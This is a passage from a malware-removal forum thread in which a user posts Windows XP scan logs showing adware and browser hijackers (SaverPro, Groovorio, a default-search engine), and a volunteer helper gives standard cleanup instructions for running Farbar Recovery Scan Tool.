BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
BHO: SaverPro: {B1C50D68-A112-A194-98C5-6E673EC9E3A8} - c:\documents and settings\all users\application data\saverpro\HeV0cV.dll
BHO: MSN Toolbar BHO: {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - c:\program files\msn toolbar\platform\4.0.0357.1\npwinext.dll
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - c:\program files\java\jre7\bin\jp2ssv.dll
BHO: HP Smart BHO Class: {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} - c:\program files\hp\digital imaging\smart web printing\hpswp_BHO.dll
TB: Acer eDataSecurity Management: {5CBE3B7C-1E47-477e-A7DD-396DB0476E29} - c:\windows\system32\eDStoolbar.dll
TB: MSN Toolbar: {8dcb7100-df86-4384-8842-8fa844297b3f} - c:\program files\msn toolbar\platform\4.0.0357.1\npwinext.dll
TB: avast! WebRep: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - c:\program files\avast software\avast\aswWebRepIE.dll
EB: HP Smart Web Printing: {555D4D79-4BD2-4094-A395-CFC534424A05} - c:\program files\hp\digital imaging\smart web printing\hpswp_bho.dll
uRun: [SpybotSD TeaTimer] c:\program files\spybot - search & destroy\TeaTimer.exe
uRun: [SUPERAntiSpyware] c:\program files\superantispyware\SUPERAntiSpyware.exe
uRun: [Spotify Web Helper] "c:\documents and settings\jay\application data\spotify\data\SpotifyWebHelper.exe"
mRun: [LaunchApp] Alaunch
mRun: [RTHDCPL] RTHDCPL.EXE
mRun: [SkyTel] SkyTel.EXE
mRun: [ntiMUI] c:\program files\newtech infosystems\nti cd & dvd-maker 7\ntiMUI.exe
mRun: [RemoteControl] "c:\program files\cyberlink\powerdvd\PDVDServ.exe"
mRun: [IMJPMIG8.1] "c:\windows\ime\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
mRun: [IMEKRMIG6.1] c:\windows\ime\imkr6_1\IMEKRMIG.EXE
mRun: [MSPY2002] c:\windows\system32\ime\pintlgnt\ImScInst.exe /SYNC
mRun: [PHIME2002ASync] c:\windows\system32\ime\tintlgnt\TINTSETP.EXE /SYNC
mRun: [PHIME2002A] c:\windows\system32\ime\tintlgnt\TINTSETP.EXE /IMEName
mRun: [IgfxTray] c:\windows\system32\igfxtray.exe
mRun: [HotKeysCmds] c:\windows\system32\hkcmd.exe
mRun: [Persistence] c:\windows\system32\igfxpers.exe
mRun: [eDataSecurity Loader] c:\acer\empowering technology\edatasecurity\eDSloader.exe 0
mRun: [eRecoveryService] c:\acer\empowering technology\erecovery\eRAgent.exe
mRun: [QuickCare2.2] c:\program files\qwest\quickcare\bin\sprtcmd.exe /P QuickCare2.2
mRun: [AmazonGSDownloaderTray] c:\program files\amazon\amazon games & software downloader\AmazonGSDownloaderTray.exe
mRun: [avast] "c:\program files\avast software\avast\avastUI.exe" /nogui
mRun: [MSN Toolbar] "c:\program files\msn toolbar\platform\4.0.0357.1\mswinext.exe"
mRun: [Microsoft Default Manager] "c:\program files\microsoft\search enhancement pack\default manager\DefMgr.exe" -resume
mRun: [APSDaemon] "c:\program files\common files\apple\apple application support\APSDaemon.exe"
mRun: [iTunesHelper] "c:\program files\itunes\iTunesHelper.exe"
mRun: [QuickTime Task] "c:\program files\quicktime\QTTask.exe" -atboottime
mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe"
mRun: [SunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"
mRun: [HP Software Update] c:\program files\hp\hp software update\HPWuSchd2.exe
mRun: [upfst_us_199.exe] c:\documents and settings\jay\local settings\application data\fst_us_199\upfst_us_199.exe -runhelper
mRun: [Malwarebytes Anti-Malware (reboot)] "c:\program files\malwarebytes' anti-malware\iexplore.exe" /runcleanupscript
StartupFolder: c:\docume~1\jay\startm~1\programs\startup\mypcba~1.lnk - c:\qoobox\quarantine\c\program files\mypc backup\MyPC Backup.exe.vir
StartupFolder: c:\docume~1\jay\startm~1\programs\startup\_uninst_.lnk - c:\documents and settings\jay\local settings\temp\_uninst_.bat
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\acerwl~1.lnk - c:\program files\acer wlan 11g usb dongle\ZDWlan.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\adobeg~1.lnk - c:\program files\common files\adobe\calibration\Adobe Gamma Loader.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\hpdigi~1.lnk - c:\program files\hp\digital imaging\bin\hpqtra08.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\winzip~1.lnk - c:\program files\winzip\WZQKPICK.EXE
uPolicies-Explorer: NoDriveTypeAutoRun = dword:323
uPolicies-Explorer: NoDriveAutoRun = dword:67108863
uPolicies-Explorer: NoDrives = dword:0
mPolicies-Explorer: NoDriveAutoRun = dword:67108863
mPolicies-Explorer: NoDriveTypeAutoRun = dword:323
mPolicies-Explorer: NoDrives = dword:0
mPolicies-Windows\System: Allow-LogonScript-NetbiosDisabled = dword:1
mPolicies-Explorer: NoDriveTypeAutoRun = dword:323
mPolicies-Explorer: NoDriveAutoRun = dword:67108863
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
IE: {DDE87865-83C5-48c4-8357-2F5B1AA84522} - {DDE87865-83C5-48c4-8357-2F5B1AA84522} - c:\program files\hp\digital imaging\smart web printing\hpswp_BHO.dll
IE: {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - {53707962-6F74-2D53-2644-206D7942484F} - c:\program files\spybot - search & destroy\SDHelper.dll
IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe
IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe
DPF: {0E5F0222-96B9-11D3-8997-00104BD12D94} - hxxp://pcpitstop.com/pcpitstop/PCPitStop.CAB
DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} - hxxp://www.kaspersky.com/kos/english/kavwebscan_unicode.cab
DPF: {166B1BCA-3F9C-11CF-8075-444553540000} - hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} - hxxp://gfx1.mail.live.com/mail/w1/resources/MSNPUpld.cab
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - hxxp://download.eset.com/special/eos/OnlineScanner.cab
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
TCP: NameServer = 69.144.127.53 68.116.46.115 71.9.127.107
TCP: Interfaces\{CFC10892-8484-42F4-A98A-DAFA48F3A805} : DHCPNameServer = 69.144.127.53 68.116.46.115 71.9.127.107
Notify: !SASWinLogon - c:\program files\superantispyware\SASWINLO.DLL
Notify: igfxcui - igfxdev.dll
SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dll
SEH: SABShellExecuteHook Class - {5AE067D3-9AFB-48E0-853A-EBB7F4A000DA} - c:\program files\superantispyware\SASSEH.DLL
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "c:\program files\google\chrome\application\36.0.1985.125\installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
.
================= FIREFOX ===================
.
FF - ProfilePath - c:\documents and settings\jay\application data\mozilla\firefox\profiles\vthtiiie.default\
FF - prefs.js: browser.search.selectedEngine - default-search.net
FF - prefs.js: browser.startup.homepage - hxxp://www.google.com/
FF - prefs.js: keyword.URL - hxxp://www.default-search.net/search?sid=516&aid=104&itype=n&ver=13539&tm=436&src=ds&p=
FF - plugin: c:\documents and settings\jay\local settings\application data\robloxversions\version-759151294bb84441\NPRobloxProxy.dll
FF - plugin: c:\program files\adobe\reader 11.0\reader\air\nppdf32.dll
FF - plugin: c:\program files\canon\zoombrowser ex\program\NPCIG.dll
FF - plugin: c:\program files\google\update\1.3.24.15\npGoogleUpdate3.dll
FF - plugin: c:\program files\java\jre7\bin\plugin2\npjp2.dll
FF - plugin: c:\program files\microsoft silverlight\5.1.20513.0\npctrlui.dll
FF - plugin: c:\program files\msn toolbar\platform\4.0.0357.1\npwinext.dll
FF - plugin: c:\windows\system32\adobe\director\np32dsw_1211151.dll
FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_14_0_0_145.dll
FF - plugin: c:\windows\system32\npdeployJava1.dll
FF - plugin: c:\windows\system32\npptools.dll
FF - ExtSQL: !HIDDEN! 2009-09-02 18:55; {20a82645-c095-46ed-80e3-08825760534b}; c:\windows\microsoft.net\framework\v3.5\windows presentation foundation\DotNetAssistantExtension
FF - ExtSQL: !HIDDEN! 2011-09-19 21:23; smartwebprinting@hp.com; c:\program files\hp\digital imaging\smart web printing\MozillaAddOn3
.
============= SERVICES / DRIVERS ===============
.
R0 aswKbd;aswKbd;c:\windows\system32\drivers\aswKbd.sys [2012-3-30 21576]
R0 aswNdis;avast! Firewall NDIS Filter Service;c:\windows\system32\drivers\aswNdis.sys [2011-9-5 12112]
R0 aswNdis2;avast! Firewall Core Firewall Service;c:\windows\system32\drivers\aswNdis2.sys [2011-9-5 204784]
R0 aswRvrt;aswRvrt;c:\windows\system32\drivers\aswRvrt.sys [2013-3-21 49376]
R0 aswVmm;aswVmm;c:\windows\system32\drivers\aswVmm.sys [2013-3-21 175176]
R1 aswFW;avast! TDI Firewall driver;c:\windows\system32\drivers\aswFW.sys [2011-9-5 104752]
R1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys [2011-9-5 770344]
R1 aswSP;aswSP;c:\windows\system32\drivers\aswSP.sys [2011-9-5 369584]
R1 F06DEFF2-5B9C-490D-910F-35D3A9119622;F06DEFF2-5B9C-490D-910F-35D3A9119622;c:\program files\settings manager\smdmf\smdmfmgrc2.cfg [2014-8-10 34192]
R1 netfilter;netfilter;c:\windows\system32\drivers\netfilter.sys [2014-7-11 47488]
R1 SASDIFSV;SASDIFSV;c:\program files\superantispyware\sasdifsv.sys [2011-7-22 12880]
R1 SASKUTIL;SASKUTIL;c:\program files\superantispyware\SASKUTIL.SYS [2011-7-12 67664]
R2 !SASCORE;SAS Core Service;c:\program files\superantispyware\SASCore.exe [2011-8-11 116608]
R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [2011-9-5 29816]
R2 aswMonFlt;aswMonFlt;c:\windows\system32\drivers\aswMonFlt.sys [2013-3-21 66336]
R2 avast! Antivirus;avast! Antivirus;c:\program files\avast software\avast\AvastSvc.exe [2011-9-5 46808]
R2 avast! Firewall;avast! Firewall;c:\program files\avast software\avast\afwServ.exe [2011-9-5 137960]
R2 IntuitUpdateServiceV4;Intuit Update Service v4;c:\program files\common files\intuit\update service v4\IntuitUpdateService.exe [2012-2-6 13672]
R2 SmdmFService;SmdmF Service;c:\program files\settings manager\smdmf\SmdmFService.exe [2014-8-10 3572240]
S1 ssnfd;ssnfd;c:\windows\system32\drivers\ssnfd.sys --> c:\windows\system32\drivers\ssnfd.sys [?]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
S2 sprtlisten;SupportSoft Listener Service;c:\program files\common files\supportsoft\bin\sprtlisten.exe /identity quickassist    --> c:\program files\common files\supportsoft\bin\sprtlisten.exe  [?]
S3 06624408;06624408; [x]
S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;c:\windows\microsoft.net\framework\v4.0.30319\wpf\WPFFontCache_v0400.exe [2010-3-18 753504]
S4 Amazon Download Agent;Amazon Download Agent;c:\program files\amazon\amazon games & software downloader\amazongsdownloaderservice.exe --> c:\program files\amazon\amazon games & software downloader\AmazonGSDownloaderService.exe [?]
S4 Symantec Core LC;Symantec Core LC;"c:\program files\common files\symantec shared\ccpd-lc\symlcsvc.exe" --> c:\program files\common files\symantec shared\ccpd-lc\symlcsvc.exe [?]
.
=============== Created Last 30 ================
.
2014-08-11 01:57:20    --------    d-----w-    c:\documents and settings\all users\application data\ea5b54591d578367
2014-08-11 01:57:15    --------    d-----w-    c:\documents and settings\jay\AppData
2014-08-11 01:57:13    --------    d-----w-    c:\documents and settings\all users\application data\SaverPro
2014-08-11 01:46:44    --------    d-----w-    c:\documents and settings\all users\application data\Browser System Enahncer
2014-08-11 01:46:21    --------    d-----w-    c:\documents and settings\all users\application data\2308189059
2014-08-11 01:02:54    98816    ----a-w-    c:\windows\sed.exe
2014-08-11 01:02:54    256000    ----a-w-    c:\windows\PEV.exe
2014-08-11 01:02:54    208896    ----a-w-    c:\windows\MBR.exe
2014-08-11 01:02:14    --------    d-----w-    c:\program files\ToggleMark
2014-08-11 01:02:14    --------    d-----w-    c:\program files\Groovorio
2014-08-11 01:00:36    --------    d-----w-    c:\program files\0F467D68-149F-43B9-A30F-62DA8D197FC3
2014-08-11 00:59:53    --------    d-----w-    c:\documents and settings\jay\application data\VOPackage
2014-08-11 00:58:47    --------    d-----w-    c:\documents and settings\jay\local settings\application data\Linkey
2014-08-11 00:58:32    --------    d-----w-    c:\program files\Optimizer Pro
2014-08-11 00:58:16    --------    d-----w-    c:\documents and settings\jay\application data\FirefoxToolbar
2014-08-11 00:58:06    --------    d-----w-    c:\program files\Settings Manager
2014-08-11 00:57:51    --------    d-----w-    c:\documents and settings\jay\local settings\application data\fst_us_199
2014-08-11 00:57:50    --------    d-----w-    c:\program files\fst_us_199
2014-08-11 00:57:43    --------    d-----w-    c:\documents and settings\all users\application data\smdmf
2014-08-11 00:57:31    --------    d-----w-    c:\program files\005
2014-08-11 00:54:46    --------    d-----w-    c:\documents and settings\jay\local settings\application data\SearchProtect
2014-08-10 20:35:49    536576    ----a-w-    c:\windows\system32\sqlite3.dll
2014-08-10 20:32:56    --------    d-----w-    C:\AdwCleaner
2014-08-10 20:28:59    770384    ----a-w-    c:\program files\mozilla firefox\msvcr100.dll
.
==================== Find3M  ====================
.
2014-07-11 14:13:52    47488    ----a-w-    c:\windows\system32\drivers\netfilter.sys
2014-07-09 14:01:59    71344    ----a-w-    c:\windows\system32\FlashPlayerCPLApp.cpl
2014-07-09 14:01:59    699056    ----a-w-    c:\windows\system32\FlashPlayerApp.exe
.
============= FINISH: 22:54:40.34 ===============

 

3. I do not have my original Windows CD.

Thank you in advance for your time and effort in assisting me!!



#4 Starbuck

    'r Brudiwr


  • Malware Response Team

Posted 19 August 2014 - 03:03 PM

Hi rockgremlin

Please take note of the following:

1. Please do not run any other tools unless instructed.
2. Please don't install or uninstall anything unless asked.
3. The cleaning process is not instant. Please continue to review my answers until I tell you that your computer is clean.
4. If there's anything that you don't understand, please ask your question(s) before proceeding with the fixes.
5. Please reply to this thread. Do not start a new topic.
6. Please follow steps in the correct order.

Let's make things a bit easier for ourselves......

Please disable Spybot S&D’s TeaTimer protection, because it is known to interfere with our fixes.
  • Open Spybot and click on 'Mode' then click 'Advanced Mode'.
  • Click on 'Tools' in bottom left hand corner.
  • Click on the 'System Startup' icon.
    Uncheck 'Teatimer' box and/or uncheck 'Resident'.
  • Then, check next to the computer clock to see if the icon for Spybot is still there.
    If it is, right click it and choose 'exit Spybot-S&D Resident'.
Reboot the computer.

Or better still, once you have stopped Tea Timer from running... Uninstall Spybot.
We don't recommend it any more due to bad test results.
Avast will do the job a lot better anyway.

Recommendation.
SuperAntiSpyware doesn't need to start when Windows starts.
You can start it manually when you need to do a scan.

To change this:
Restart SuperAntiSpyware...
Then from the main page, Click on the Preferences button....then untick... 'Start SuperAntiSpyware when Windows starts'.
Then click Close, and then Close on the next screen to exit the program.


For x32 bit systems download Farbar Recovery Scan Tool and save it to your Desktop.
  • Double-click the downloaded icon to run the tool. Vista/Windows 7/8 users right-click and select Run As Administrator.
  • When the tool opens click Yes to disclaimer.
  • Make sure that Addition.txt is selected at the bottom.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The first time the tool is run, it also makes another log (Addition.txt). Please copy and paste it to your reply also.

In your next reply, please submit:
Both reports from FRST


Thanks.


#5 rockgremlin

  • Topic Starter


Posted 21 August 2014 - 10:46 PM

Cheers 'r Brudiwr,

Much obliged for the assistance. Followed all instructions, see attached files.

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:21-08-2014
Ran by Jay (administrator) on MOLES on 21-08-2014 21:35:40
Running from C:\Documents and Settings\Jay\My Documents\Downloads
Platform: Microsoft Windows XP Professional Service Pack 3 (X86) OS Language: English (United States)
Internet Explorer Version 7
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\afwServ.exe
(SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCore.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Intuit Inc.) C:\Program Files\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
(Oracle Corporation) C:\Program Files\Java\jre7\bin\jqs.exe
(Realtek Semiconductor Corp.) C:\WINDOWS\RTHDCPL.exe
(Cyberlink Corp.) C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
(Intel Corporation) C:\WINDOWS\system32\hkcmd.exe
(Intel Corporation) C:\WINDOWS\system32\igfxpers.exe
(HiTRUST) C:\Acer\Empowering Technology\eDataSecurity\eDSloader.exe
(Acer Inc.) C:\Acer\Empowering Technology\eRecovery\eRAgent.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Microsoft Corp.) C:\Program Files\MSN Toolbar\Platform\4.0.0357.1\mswinext.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuschd2.exe
(Microsoft Corporation) C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Spotify Ltd) C:\Documents and Settings\Jay\Application Data\Spotify\Data\SpotifyWebHelper.exe
(Aztec Media Inc) C:\Program Files\Settings Manager\smdmf\SmdmFService.exe
(Aztec Media Inc) C:\Program Files\Settings Manager\smdmf\SmdmFService.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(X-Micro Technology Corp.) C:\Program Files\Acer WLAN 11g USB Dongle\ZDWlan.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
(Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
(WinZip Computing, S.L.) C:\Program Files\WinZip\WZQKPICK.EXE
(Microsoft Corporation) C:\WINDOWS\system32\wscntfy.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe
(Hewlett-Packard) C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe
(Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\plugin-container.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\Setup\avast.setup


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [LaunchApp] => Alaunch
HKLM\...\Run: [RTHDCPL] => C:\WINDOWS\RTHDCPL.EXE [16207872 2006-05-17] (Realtek Semiconductor Corp.)
HKLM\...\Run: [SkyTel] => C:\WINDOWS\SkyTel.EXE [2879488 2006-05-15] (Realtek Semiconductor Corp.)
HKLM\...\Run: [ntiMUI] => c:\Program Files\NewTech Infosystems\NTI CD & DVD-Maker 7\ntiMUI.exe [45056 2005-05-11] ()
HKLM\...\Run: [RemoteControl] => C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe [32768 2004-11-02] (Cyberlink Corp.)
HKLM\...\Run: [IMJPMIG8.1] => C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE [208952 2004-08-03] (Microsoft Corporation)
HKLM\...\Run: [IMEKRMIG6.1] => C:\WINDOWS\ime\imkr6_1\IMEKRMIG.EXE [44032 2004-08-03] (Microsoft Corporation)
HKLM\...\Run: [MSPY2002] => C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe [59392 2004-08-03] ()
HKLM\...\Run: [PHIME2002ASync] => C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE [455168 2004-08-03] (Microsoft Corporation)
HKLM\...\Run: [PHIME2002A] => C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE [455168 2004-08-03] (Microsoft Corporation)
HKLM\...\Run: [eDataSecurity Loader] => C:\Acer\Empowering Technology\eDataSecurity\eDSloader.exe [345088 2006-03-17] (HiTRUST)
HKLM\...\Run: [eRecoveryService] => C:\Acer\Empowering Technology\eRecovery\eRAgent.exe [413696 2006-06-01] (Acer Inc.)
HKLM\...\Run: [QuickCare2.2] => C:\Program Files\Qwest\QuickCare\bin\sprtcmd.exe [198184 2007-05-04] ()
HKLM\...\Run: [AmazonGSDownloaderTray] => C:\Program Files\Amazon\Amazon Games & Software Downloader\AmazonGSDownloaderTray.exe [247296 2009-04-06] (Amazon.com)
HKLM\...\Run: [avast] => C:\Program Files\AVAST Software\Avast\avastUI.exe [4858968 2013-05-09] (AVAST Software)
HKLM\...\Run: [MSN Toolbar] => C:\Program Files\MSN Toolbar\Platform\4.0.0357.1\mswinext.exe [240992 2009-11-16] (Microsoft Corp.)
HKLM\...\Run: [Microsoft Default Manager] => C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe [288080 2009-07-17] (Microsoft Corporation)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [59280 2012-10-11] (Apple Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [421776 2012-09-09] (Apple Inc.)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2012-10-25] (Apple Inc.)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [253816 2013-03-12] (Oracle Corporation)
HKLM\...\Run: [HP Software Update] => C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM\...\Run: [upfst_us_199.exe] => C:\Documents and Settings\Jay\Local Settings\Application Data\fst_us_199\upfst_us_199.exe -runhelper
HKLM\...\Run: [Malwarebytes Anti-Malware (reboot)] => "C:\Program Files\Malwarebytes' Anti-Malware\iexplore.exe" /runcleanupscript
HKLM\...\Run: [fst_us_199] => [X]
Winlogon\Notify\!SASWinLogon: C:\Program Files\SUPERAntiSpyware\SASWINLO.DLL (SUPERAntiSpyware.com)
HKU\S-1-5-21-943902637-2227688448-3181155623-1005\...\Run: [SUPERAntiSpyware] => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [4603264 2011-08-12] ()
HKU\S-1-5-21-943902637-2227688448-3181155623-1005\...\Run: [Spotify Web Helper] => C:\Documents and Settings\Jay\Application Data\Spotify\Data\SpotifyWebHelper.exe [1103768 2013-02-16] (Spotify Ltd)
Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Acer WLAN 11g USB Dongle.lnk
ShortcutTarget: Acer WLAN 11g USB Dongle.lnk -> C:\Program Files\Acer WLAN 11g USB Dongle\ZDWlan.exe (X-Micro Technology Corp.)
Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Adobe Gamma Loader.lnk
ShortcutTarget: Adobe Gamma Loader.lnk -> C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe (Adobe Systems, Inc.)
Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\WinZip Quick Pick.lnk
ShortcutTarget: WinZip Quick Pick.lnk -> C:\Program Files\WinZip\WZQKPICK.EXE (WinZip Computing, S.L.)
Startup: C:\Documents and Settings\Jay\Start Menu\Programs\Startup\MyPC Backup.lnk
ShortcutTarget: MyPC Backup.lnk -> C:\Qoobox\Quarantine\C\Program Files\MyPC Backup\MyPC Backup.exe.vir (MyPCBackup.com)
HKLM\...\AppCertDlls: [x64] -> c:\program files\settings manager\smdmf\x64\sysapcrt.dll
HKLM\...\AppCertDlls: [x86] -> c:\program files\settings manager\smdmf\sysapcrt.dll [488464 2014-07-28] ()
ShellIconOverlayIdentifiers: 00avast -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll (AVAST Software)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

ProxyServer: http=127.0.0.1
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,SearchMigratedDefaultURL = http://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?}
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://groovorio.com/?f=1&a=grv_tuto1_14_30&cd=2XzuyEtN2Y1L1QzutDtDtCzytBtCyDyC0CzzyBtC0Ezy0AtAtN0D0Tzu0SzyyDtAtN1L2XzutBtFtBtCtFtCzztFtAtN1L1Czu1N1C2X1V2Z2Y2Z1FtC1VtCyE1VtAtDtN1L1G1B1V1N2Y1L1Qzu2StD0CtCzyyE0DzzzztG0FtCyBzztGzz0E0EzztGtCyD0AtDtGtCzytA0B0D0Ezz0Ezz0A0CtC2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyE0CyCtA0A0AzyzytGtD0DyBtAtG0CyCyDtAtG0A0ByDzztGtCtByBzz0C0EyEyB0BtC0FtC2Q&cr=752508404&ir=
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm
SearchScopes: HKLM - DefaultScope {CC865B26-C31D-4D23-B17B-96548EEF03F6} URL = http://groovorio.com/results.php?f=4&q={searchTerms}&a=grv_tuto1_14_30&cd=2XzuyEtN2Y1L1QzutDtDtCzytBtCyDyC0CzzyBtC0Ezy0AtAtN0D0Tzu0SzyyDtAtN1L2XzutBtFtBtCtFtCzztFtAtN1L1Czu1N1C2X1V2Z2Y2Z1FtC1VtCyE1VtAtDtN1L1G1B1V1N2Y1L1Qzu2StD0CtCzyyE0DzzzztG0FtCyBzztGzz0E0EzztGtCyD0AtDtGtCzytA0B0D0Ezz0Ezz0A0CtC2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyE0CyCtA0A0AzyzytGtD0DyBtAtG0CyCyDtAtG0A0ByDzztGtCtByBzz0C0EyEyB0BtC0FtC2Q&cr=752508404&ir=
SearchScopes: HKLM - {9BB47C17-9C68-4BB3-B188-DD9AF0FD2516} URL = http://www.default-search.net/search?sid=516&aid=104&itype=n&ver=13539&tm=436&src=ds&p={searchTerms}
SearchScopes: HKLM - {CC865B26-C31D-4D23-B17B-96548EEF03F6} URL = http://groovorio.com/results.php?f=4&q={searchTerms}&a=grv_tuto1_14_30&cd=2XzuyEtN2Y1L1QzutDtDtCzytBtCyDyC0CzzyBtC0Ezy0AtAtN0D0Tzu0SzyyDtAtN1L2XzutBtFtBtCtFtCzztFtAtN1L1Czu1N1C2X1V2Z2Y2Z1FtC1VtCyE1VtAtDtN1L1G1B1V1N2Y1L1Qzu2StD0CtCzyyE0DzzzztG0FtCyBzztGzz0E0EzztGtCyD0AtDtGtCzytA0B0D0Ezz0Ezz0A0CtC2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyE0CyCtA0A0AzyzytGtD0DyBtAtG0CyCyDtAtG0A0ByDzztGtCtByBzz0C0EyEyB0BtC0FtC2Q&cr=752508404&ir=
